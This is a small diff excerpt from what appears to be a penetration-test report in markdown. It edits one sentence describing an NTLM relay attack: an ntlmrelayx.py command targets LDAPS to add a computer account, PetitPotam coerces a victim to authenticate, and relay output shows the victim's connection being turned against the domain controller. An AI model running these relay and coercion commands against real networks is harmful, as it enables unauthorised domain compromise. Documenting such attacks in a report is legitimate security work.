GasPROt/reportcybersec/report.md

 ```
 ntlmrelayx.py -t ldaps://10.0.0.100 --add-computer carlotrustedpc
 ```
-And, when we leverage the PetitPotam tool to coerce the victim (with webservice client running) to authenticate to the attacker by using the very same command shown before, we get:
+When we leverage the PetitPotam tool to coerce the victim (with webservice client running) to authenticate to the attacker by using the very same command shown before, we get:
 ```
 [*] Servers started, waiting for connections
 [*] HTTPD(80): Connection from 10.0.0.2 controlled, attacking target ldaps://10.0.0.100